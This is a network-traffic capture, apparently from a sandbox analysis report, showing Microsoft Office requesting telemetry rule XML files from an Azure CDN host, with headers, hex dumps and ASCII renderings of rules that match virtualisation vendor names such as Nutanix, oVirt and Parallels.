                                                                                                                                                                                                                                              2024-11-02 06:16:04 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              52192.168.2.46376813.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:04 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:05 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:05 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 477
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                                                                              x-ms-request-id: c82f15e6-f01e-00aa-2d36-2c8521000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061605Z-16ccfc49897b872mhC1DFWqtb000000001ng00000000b3m8
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:05 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              53192.168.2.46376913.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:05 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:05 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 472
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                                                                              x-ms-request-id: cc16d6e3-a01e-001e-1208-2c49ef000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061605Z-16ccfc498974624whC1DFWdg3800000001f000000000mrps
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:05 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              54192.168.2.46377013.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:05 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:05 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                                                                              x-ms-request-id: 6c1a6569-101e-00a2-3008-2c9f2e000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061605Z-16ccfc498972c2r2hC1DFWxq6800000001r000000000559v
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:05 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              55192.168.2.46377113.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:05 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:05 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:05 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                                                                              x-ms-request-id: 1cb8ba43-301e-0033-2d08-2cfa9c000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061605Z-16ccfc49897kh956hC1DFW2afc00000001vg000000003ut5
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:05 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              56192.168.2.46377213.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:05 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:05 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 485
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BB9769355"
                                                                                                                                                                                                                                              x-ms-request-id: 9ba15ece-101e-0034-5d08-2c96ff000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061605Z-16ccfc49897w6rdhhC1DFWb10w00000001pg0000000075av
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:05 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              57192.168.2.46377413.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:05 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:05 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 411
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582B989AF051"
                                                                                                                                                                                                                                              x-ms-request-id: 48ab1ac5-a01e-0070-1038-2c573b000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061605Z-16ccfc49897d998fhC1DFWbah400000001mg00000000m406
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:05 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              58192.168.2.46377513.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:05 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:06 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 470
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                                                                              x-ms-request-id: 24f20e23-801e-0078-0539-2bbac6000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061606Z-16ccfc49897jxxn9hC1DFWexyc00000001kg00000000aghx
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:06 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              59192.168.2.46377613.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:05 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:06 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:06 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 427
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BB556A907"
                                                                                                                                                                                                                                              x-ms-request-id: 23757113-901e-0029-2f3e-2c274a000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061606Z-r159446fcd7xfscrhC1DFWamb00000000150000000000p98
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:06 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              60192.168.2.46377713.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:06 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:06 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 502
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                                                                              x-ms-request-id: e515af6a-f01e-0099-70a8-2b9171000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061606Z-16dc884887bkpzdnhC1DFWbc3n00000001w0000000000cvd
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
